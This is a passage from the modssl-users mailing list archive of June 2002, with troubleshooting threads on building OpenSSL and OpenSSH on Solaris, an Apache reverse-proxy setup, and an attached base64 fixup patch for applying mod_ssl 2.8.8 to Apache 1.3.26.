Reply-To: modssl-users@modssl.org
X-Sender: Shon Stephens 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am trying to compile modssl. before i can do so, i need to get openssl
compiled and working. i did not want to use openssl's internal prng. so i
patched my solaris 8 system to provide a /dev/random & /dev/urandom. i
thought that these would be detected by the configure script. however, it
appears to me that the openssl is still using its internal prng, not the
system devices. can anyone help me with this? 

yes, i know, slightly off topic.
thanks,
shon
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 18 23:07:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA03065; Tue, 18 Jun 2002 23:06:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA03052; Tue, 18 Jun 2002 23:05:58 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5IL16G04434;
	Tue, 18 Jun 2002 17:01:06 -0400
Date: Tue, 18 Jun 2002 17:01:06 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Shon Stephens 
cc: "'modssl-users@modssl.org'" 
Subject: Re: compiling openssl for modssl - help!
In-Reply-To: <304CFC651EDCD4118AA800D0B774AFB36F4A50@hunter.goamerica.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 18 Jun 2002, Shon Stephens wrote:

> i am trying to compile modssl. before i can do so, i need to get openssl
> compiled and working. i did not want to use openssl's internal prng. so i
> patched my solaris 8 system to provide a /dev/random & /dev/urandom. i
> thought that these would be detected by the configure script. however, it
> appears to me that the openssl is still using its internal prng, not the
> system devices. can anyone help me with this?

What version numbers are we talking about here?  Apache, mod_ssl, OpenSSL,
etc.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 00:07:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA06480; Wed, 19 Jun 2002 00:06:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id AAA06429; Wed, 19 Jun 2002 00:05:31 +0200 (MET DST)
Received: (qmail 586 invoked from network); 19 Jun 2002 10:05:27 +1200
Received: from thoth.trimble.co.nz (155.63.248.21)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 19 Jun 2002 10:05:27 +1200
Received: (qmail 13039 invoked by uid 403); 19 Jun 2002 10:05:26 +1200
Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/301/46989. sophie: 2.10/3.58. spamassassin: 2.21. . Clear:. Processed in 0.083979 secs); 18 Jun 2002 22:05:26 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by thoth.trimble.co.nz with SMTP; 19 Jun 2002 10:05:26 +1200
Received: (qmail 24002 invoked by uid 500); 18 Jun 2002 22:05:26 -0000
Date: Wed, 19 Jun 2002 10:05:26 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
Message-ID: <20020618220526.GD18418@trimble.co.nz>
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk> <3D073574.3060301@itaction.co.uk> <3D0739D7.9657779A@godden.net> <3D073FF8.3080801@itaction.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3D073FF8.3080801@itaction.co.uk>
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jun 12, 2002 at 01:35:04PM +0100, Peter Viertel wrote:
> thats basically right.
> ...
> Wim Godden wrote:
> 
> >So there's no system which allows me to really proxy pages and 'modify' 
> >them so
> >that all future connections go through this 'proxy' as well ?
> >

There is one way...

It can only work if the "internal" server has a hostname that can be
hijacked by the reverse proxy server.

i.e. if you are wanting to do:

client --- Internet ---> https://www.mycompany.com/

..then you can do:

client --- Internet ---> https://www.mycompany.com/ --- Internal ---
http://www.mycompany.com/


e.g. on the Internet www.mycompany.com is 1.2.3.4, whereas internally
www.mycompany.com is 10.1.2.3

Then you can set up your Apache reverse proxy so that it proxies "/" - i.e.
run www.mycompany.com as a full VirtualHost.

Done it - it works :-)


-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 01:31:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA12014; Wed, 19 Jun 2002 01:30:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ma101.mailarmory.com id BAA11965; Wed, 19 Jun 2002 01:29:32 +0200 (MET DST)
Received: from deimos.frii.net (deimos.frii.com [216.17.128.2])
	by ma101.mailarmory.com (8.12.4/8.12.4) with ESMTP id g5INTUnI026872
	for ; Tue, 18 Jun 2002 17:29:30 -0600 (MDT)
Received: from elara.frii.com (elara.frii.com [216.17.128.9])
	by deimos.frii.net (8.12.4/8.12.4) with ESMTP id g5INTTK0055540
	for ; Tue, 18 Jun 2002 17:29:29 -0600 (MDT)
Date: Tue, 18 Jun 2002 17:29:29 -0600 (MDT)
From: Matthew Ruzicka 
To: modssl-users@modssl.org
Subject: Apache 1.3.26 and mod_ssl
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matthew Ruzicka 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Pardon my possible ignorance here, but has anyone come up with any good
work arounds for getting mod_ssl to work with the (patched) Apache 1.3.26
since 2.8.8-1.3.24 only wants to work with 1.3.24?

I assume a new version of mod_ssl will be on its way shortly, but was
looking for something in the meantime to close up any possible problems.

Thanks.

Matthew Ruzicka                    | Front Range Internet, Inc.
mattr@frii.net                     | www.frii.com info@frii.com
Technical Operations               | 970-212-0700 800-935-6527


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 01:58:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA13348; Wed, 19 Jun 2002 01:57:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id BAA13317; Wed, 19 Jun 2002 01:56:22 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 18 Jun 2002 16:56:44 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 18 Jun 2002 16:56:08 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 18 Jun 2002 16:55:53 -0700
From: "Jeff Landers" 
To: 
Subject: Configuring openssh 3.2 won't work
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id BAA13345
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have been trying to build openssh but can't get it to work.

Solaris 8
openssl0.9.6c
zlib from sunfreeware.com
/dev/random patch installed

./configure --with-zlib=/usr/include --with-ssl-dir=/usr/local/ssl

The config log just shows many parse errors and symbol errors. What do I need to do to get this to go?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:01:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA13644; Wed, 19 Jun 2002 02:00:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id BAA13522; Wed, 19 Jun 2002 01:59:40 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5INspB10243
	for ; Tue, 18 Jun 2002 19:54:51 -0400
Date: Tue, 18 Jun 2002 19:54:51 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 and mod_ssl
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 18 Jun 2002, Matthew Ruzicka wrote:

> Pardon my possible ignorance here, but has anyone come up with any good
> work arounds for getting mod_ssl to work with the (patched) Apache 1.3.26
> since 2.8.8-1.3.24 only wants to work with 1.3.24?

I'm looking into it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:13:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA14016; Wed, 19 Jun 2002 02:05:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id CAA13981; Wed, 19 Jun 2002 02:04:55 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5J004E13059;
	Tue, 18 Jun 2002 20:00:04 -0400
Date: Tue, 18 Jun 2002 20:00:04 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Matthew Ruzicka 
cc: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 and mod_ssl
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 18 Jun 2002, Matthew Ruzicka wrote:

> Pardon my possible ignorance here, but has anyone come up with any good
> work arounds for getting mod_ssl to work with the (patched) Apache 1.3.26
> since 2.8.8-1.3.24 only wants to work with 1.3.24?
>
> I assume a new version of mod_ssl will be on its way shortly, but was
> looking for something in the meantime to close up any possible problems.

Using mod_ssl's ./configure --force option on 2.8.8 should work.  I just
tried it against 1.3.26 and it patched successfully.  You'll see lots of
messages like this:

Error: Application of patch failed:
-------------------------------------------------
|| extra --activate-module=ssl is required.
|+---------------------------------------------------------------------------
|Index: src/Configuration.tmpl
|--- src/Configuration.tmpl     28 Jan 2002 19:21:21 -0000      1.1.1.7
|+++ src/Configuration.tmpl     28 Jan 2002 19:40:56 -0000      1.23
--------------------------
Patching file src/Configuration.tmpl using Plan A...
Hunk #1 succeeded at 26.
Hunk #2 succeeded at 528 (offset 18 lines).
done
-------------------------------------------------

But as long as they all say "succeeded", you should be okay.  I would
normally tell people to wait for mod_ssl 2.8.9 to be released, but this is
kind of a special circumstance.  :-)

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:31:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16294; Wed, 19 Jun 2002 02:30:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from outpost.poyntons.com.au id CAA16257; Wed, 19 Jun 2002 02:30:16 +0200 (MET DST)
Received: (from uucp@localhost)
	by outpost.poyntons.com.au (8.8.8+Sun/8.8.8) id IAA17027
	for ; Wed, 19 Jun 2002 08:29:07 +0800 (WST)
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Wed, 19 Jun 2002 08:30:59 +0800
From: "James Bromberger" 
To: 
Subject: Re: Apache 1.3.26 and mod_ssl
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Seems that the current 2.8.8 has some problems patching into some of
the mod_proxy code:

./ap/Makefile.tmpl.rej
./modules/proxy/mod_proxy.c.rej
./modules/proxy/proxy_http.c.rej

Apart from those three files (536 bytes, 1312 bytes, 2607 bytes) it
looks clean...

	James

-- 
  James Bromberger,
  Senior Web/Systems Administrator, JDV
  +61 8 9268 2909, +61 417 322 500
  Fax: +61 8 9266 0200

http://conf.linux.org.au/

>>> jwoolley@apache.org 06/19/02 07:54am >>>
On Tue, 18 Jun 2002, Matthew Ruzicka wrote:

> Pardon my possible ignorance here, but has anyone come up with any
good
> work arounds for getting mod_ssl to work with the (patched) Apache
1.3.26
> since 2.8.8-1.3.24 only wants to work with 1.3.24?

I'm looking into it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:32:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16342; Wed, 19 Jun 2002 02:31:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id CAA16310; Wed, 19 Jun 2002 02:31:14 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=lttit)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17KTEm-0000XH-00
	for modssl-users@modssl.org; Wed, 19 Jun 2002 02:22:16 +0200
Date: Wed, 19 Jun 2002 02:22:15 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Subject: mod_ssl maintainership
In-Reply-To: 
References: 
X-Mailer: Sylpheed version 0.7.7 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi

It seem like due to his various other commitments, RSE is not really
active on mod_ssl anymore. Is there a plan to transfer maintainership of
mod_ssl to somebody else?

Bye
Tim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:53:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA17495; Wed, 19 Jun 2002 02:52:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id CAA17482; Wed, 19 Jun 2002 02:52:00 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5J0lBD14656
	for ; Tue, 18 Jun 2002 20:47:11 -0400
Date: Tue, 18 Jun 2002 20:47:11 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 and mod_ssl
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-1887379643-1236530708-1024447631=:18552"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---1887379643-1236530708-1024447631=:18552
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 19 Jun 2002, James Bromberger wrote:

> Seems that the current 2.8.8 has some problems patching into some of
> the mod_proxy code:
>
> ./ap/Makefile.tmpl.rej
> ./modules/proxy/mod_proxy.c.rej
> ./modules/proxy/proxy_http.c.rej

hmmmm... wonder why I didn't notice those before?  Sigh.  Anyway,
attached is a patch (totally untested!) which *should* replace the
missing part of the mod_ssl patch.  So after you've run ./configure
--force, apply this patch by going to the apache_1.3.26/ directory and
running "patch -p0 < modssl-2.8.8-1.3.26-fixup.patch".  Let me know if it
works or breaks.  ;)

--Cliff

---1887379643-1236530708-1024447631=:18552
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="modssl-2.8.8-1.3.26-fixup.patch"
Content-ID: 
Content-Description: 
Content-Disposition: attachment; filename="modssl-2.8.8-1.3.26-fixup.patch"
Content-Transfer-Encoding: BASE64

LS0tIC4vc3JjL2FwL01ha2VmaWxlLnRtcGwtMS4zLjI2CVR1ZSBKdW4gMTgg
MjA6MzI6NDggMjAwMg0KKysrIC4vc3JjL2FwL01ha2VmaWxlLnRtcGwJVHVl
IEp1biAxOCAyMDozMzoxOCAyMDAyDQpAQCAtNyw3ICs3LDcgQEANCiANCiBP
QkpTPWFwX2NweXN0cm4ubyBhcF9leGVjdmUubyBhcF9mbm1hdGNoLm8gYXBf
Z2V0cGFzcy5vIGFwX21kNWMubyBhcF9zaWduYWwubyBcDQogICAgICBhcF9z
bGFjay5vIGFwX3NucHJpbnRmLm8gYXBfc2hhMS5vIGFwX2NoZWNrcGFzcy5v
IGFwX2Jhc2U2NC5vIGFwX2ViY2RpYy5vIFwNCi0gICAgIGFwX3N0cnRvbC5v
DQorICAgICBhcF9zdHJ0b2wubyBhcF9ob29rLm8gYXBfY3R4Lm8gYXBfbW0u
bw0KIA0KIC5jLm86DQogCSQoQ0MpIC1jICQoSU5DTFVERVMpICQoQ0ZMQUdT
KSAkPA0KLS0tIC4vc3JjL21vZHVsZXMvcHJveHkvbW9kX3Byb3h5LmMtMS4z
LjI2CVR1ZSBKdW4gMTggMjA6MzQ6MTUgMjAwMg0KKysrIC4vc3JjL21vZHVs
ZXMvcHJveHkvbW9kX3Byb3h5LmMJVHVlIEp1biAxOCAyMDozNjozNiAyMDAy
DQpAQCAtNDU0LDYgKzQ1NCwxNCBAQA0KICAgICAgKi8NCiANCiAgICAgLyog
aGFuZGxlIHRoZSBzY2hlbWUgKi8NCisjaWZkZWYgRUFQSQ0KKyAgICBpZiAo
YXBfaG9va191c2UoImFwOjptb2RfcHJveHk6OmhhbmRsZXIiLA0KKyAgICAg
ICAgICAgICAgICAgICAgQVBfSE9PS19TSUc3KGludCxwdHIscHRyLHB0cixw
dHIsaW50LHB0ciksDQorICAgICAgICAgICAgICAgICAgICBBUF9IT09LX0RF
Q0xJTkUoREVDTElORUQpLA0KKyAgICAgICAgICAgICAgICAgICAgJnJjLCBy
LCBjciwgdXJsLCANCisgICAgICAgICAgICAgICAgICAgIE5VTEwsIDAsIHNj
aGVtZSkgJiYgcmMgIT0gREVDTElORUQpDQorICAgICAgICByZXR1cm4gcmM7
DQorI2VuZGlmIC8qIEVBUEkgKi8NCiAgICAgaWYgKHItPm1ldGhvZF9udW1i
ZXIgPT0gTV9DT05ORUNUKSB7DQogICAgICAgICByZXR1cm4gYXBfcHJveHlf
Y29ubmVjdF9oYW5kbGVyKHIsIGNyLCB1cmwsIE5VTEwsIDApOw0KICAgICB9
DQpAQCAtMTA1MSw0ICsxMDU5LDEwIEBADQogICAgIE5VTEwsICAgICAgICAg
ICAgICAgICAgICAgICAvKiBjaGlsZF9pbml0ICovDQogICAgIE5VTEwsICAg
ICAgICAgICAgICAgICAgICAgICAvKiBjaGlsZF9leGl0ICovDQogICAgIHBy
b3h5X2RldGVjdCAgICAgICAgICAgICAgICAvKiBwb3N0IHJlYWQtcmVxdWVz
dCAqLw0KKyNpZmRlZiBFQVBJDQorICAgLHByb3h5X2FkZG1vZCwJCS8qIEVB
UEk6IGFkZF9tb2R1bGUgKi8NCisgICAgcHJveHlfcmVtbW9kLAkJLyogRUFQ
STogcmVtb3ZlX21vZHVsZSAqLw0KKyAgICBOVUxMLAkJCS8qIEVBUEk6IHJl
d3JpdGVfY29tbWFuZCAqLw0KKyAgICBOVUxMCQkJLyogRUFQSTogbmV3X2Nv
bm5lY3Rpb24gICovDQorI2VuZGlmDQogfTsNCi0tLSAuL3NyYy9tb2R1bGVz
L3Byb3h5L3Byb3h5X2h0dHAuYy0xLjMuMjYJVHVlIEp1biAxOCAyMDozNzow
NyAyMDAyDQorKysgLi9zcmMvbW9kdWxlcy9wcm94eS9wcm94eV9odHRwLmMJ
VHVlIEp1biAxOCAyMDo0MDozNiAyMDAyDQpAQCAtMTcwLDYgKzE3MCw5IEBA
DQogICAgIGNvbnN0IGNoYXIgKmRhdGVzdHIsICp1cmxzdHI7DQogICAgIGlu
dCByZXN1bHQsIG1ham9yLCBtaW5vcjsNCiAgICAgY29uc3QgY2hhciAqY29u
dGVudF9sZW5ndGg7DQorI2lmZGVmIEVBUEkNCisgICAgY2hhciAqcGVlcjsN
CisjZW5kaWYNCiANCiAgICAgdm9pZCAqc2NvbmYgPSByLT5zZXJ2ZXItPm1v
ZHVsZV9jb25maWc7DQogICAgIHByb3h5X3NlcnZlcl9jb25mICpjb25mID0N
CkBAIC0zMjAsMTQgKzMyMyw0MyBAQA0KICAgICBmID0gYXBfYmNyZWF0ZShw
LCBCX1JEV1IgfCBCX1NPQ0tFVCk7DQogICAgIGFwX2JwdXNoZmQoZiwgc29j
aywgc29jayk7DQogDQorI2lmZGVmIEVBUEkNCisgICAgew0KKyAgICAgICAg
Y2hhciAqZXJybXNnID0gTlVMTDsNCisgICAgICAgIGFwX2hvb2tfdXNlKCJh
cDo6bW9kX3Byb3h5OjpodHRwOjpoYW5kbGVyOjpuZXdfY29ubmVjdGlvbiIs
IA0KKyAgICAgICAgICAgICAgICAgICAgQVBfSE9PS19TSUc0KHB0cixwdHIs
cHRyLHB0ciksIA0KKyAgICAgICAgICAgICAgICAgICAgQVBfSE9PS19ERUNM
SU5FKE5VTEwpLA0KKyAgICAgICAgICAgICAgICAgICAgJmVycm1zZywgciwg
ZiwgcGVlcik7DQorICAgICAgICBpZiAoZXJybXNnICE9IE5VTEwpDQorICAg
ICAgICAgICAgcmV0dXJuIGFwX3Byb3h5ZXJyb3IociwgSFRUUF9CQURfR0FU
RVdBWSwgZXJybXNnKTsNCisgICAgfQ0KKyNlbmRpZiAvKiBFQVBJICovDQor
DQogICAgIGFwX2hhcmRfdGltZW91dCgicHJveHkgc2VuZCIsIHIpOw0KICAg
ICBhcF9idnB1dHMoZiwgci0+bWV0aG9kLCAiICIsIHByb3h5aG9zdCA/IHVy
bCA6IHVybHB0ciwgIiBIVFRQLzEuMSIgQ1JMRiwNCiAgICAgICAgICAgICAg
IE5VTEwpOw0KKw0KKyNpZmRlZiBFQVBJDQorICAgIHsNCisgICAgICAgIGlu
dCByYyA9IERFQ0xJTkVEOw0KKyAgICAgICAgYXBfaG9va191c2UoImFwOjpt
b2RfcHJveHk6Omh0dHA6OmhhbmRsZXI6OndyaXRlX2hvc3RfaGVhZGVyIiwg
DQorICAgICAgICAgICAgICAgICAgICBBUF9IT09LX1NJRzYoaW50LHB0cixw
dHIscHRyLGludCxwdHIpLCANCisgICAgICAgICAgICAgICAgICAgIEFQX0hP
T0tfREVDTElORShERUNMSU5FRCksDQorICAgICAgICAgICAgICAgICAgICAm
cmMsIHIsIGYsIGRlc3Rob3N0LCBkZXN0cG9ydCwgZGVzdHBvcnRzdHIpOw0K
KyAgICAgICAgaWYgKHJjID09IERFQ0xJTkVEKSB7DQorICAgICAgICAgICAg
aWYgKGRlc3Rwb3J0c3RyICE9IE5VTEwgJiYgZGVzdHBvcnQgIT0gREVGQVVM
VF9IVFRQX1BPUlQpDQorICAgICAgICAgICAgICAgIGFwX2J2cHV0cyhmLCAi
SG9zdDogIiwgZGVzdGhvc3QsICI6IiwgZGVzdHBvcnRzdHIsIENSTEYsIE5V
TEwpOw0KKyAgICAgICAgICAgIGVsc2UNCisJCWFwX2J2cHV0cyhmLCAiSG9z
dDogIiwgZGVzdGhvc3QsIENSTEYsIE5VTEwpOw0KKyAgICAgICAgfQ0KKyAg
ICB9DQorI2Vsc2UgLyogRUFQSSAqLw0KICAgICAvKiBTZW5kIEhvc3Q6IG5v
dywgYWRkaW5nIGl0IHRvIHJlcV9oZHJzIHdvdWxkbid0IGJlIG11Y2ggYmV0
dGVyICovDQogICAgIGlmIChkZXN0cG9ydHN0ciAhPSBOVUxMICYmIGRlc3Rw
b3J0ICE9IERFRkFVTFRfSFRUUF9QT1JUKQ0KICAgICAgICAgYXBfYnZwdXRz
KGYsICJIb3N0OiAiLCBkZXN0aG9zdCwgIjoiLCBkZXN0cG9ydHN0ciwgQ1JM
RiwgTlVMTCk7DQogICAgIGVsc2UNCiAgICAgICAgIGFwX2J2cHV0cyhmLCAi
SG9zdDogIiwgZGVzdGhvc3QsIENSTEYsIE5VTEwpOw0KKyNlbmRpZg0KIA0K
ICAgICBpZiAoY29uZi0+dmlhb3B0ID09IHZpYV9ibG9jaykgew0KICAgICAg
ICAgLyogQmxvY2sgYWxsIG91dGdvaW5nIFZpYTogaGVhZGVycyAqLw0K
---1887379643-1236530708-1024447631=:18552--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 02:54:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA17531; Wed, 19 Jun 2002 02:53:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id CAA17525; Wed, 19 Jun 2002 02:53:10 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5J0mLr14692
	for ; Tue, 18 Jun 2002 20:48:21 -0400
Date: Tue, 18 Jun 2002 20:48:21 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: mod_ssl maintainership
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002, Tim Tassonis wrote:

> It seem like due to his various other commitments, RSE is not really
> active on mod_ssl anymore. Is there a plan to transfer maintainership of
> mod_ssl to somebody else?

For 2.0, it's already been transferred to the ASF.  1.3 is maintenance
mode only, and RSE still handles the releases for that.  It only takes a
day or two....

This time we're all just kind of in a hurry.  :)

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 04:16:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA23606; Wed, 19 Jun 2002 04:14:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from outpost.poyntons.com.au id EAA22145; Wed, 19 Jun 2002 04:00:57 +0200 (MET DST)
Received: (from uucp@localhost)
	by outpost.poyntons.com.au (8.8.8+Sun/8.8.8) id JAA18571
	for ; Wed, 19 Jun 2002 09:05:38 +0800 (WST)
Message-Id: 
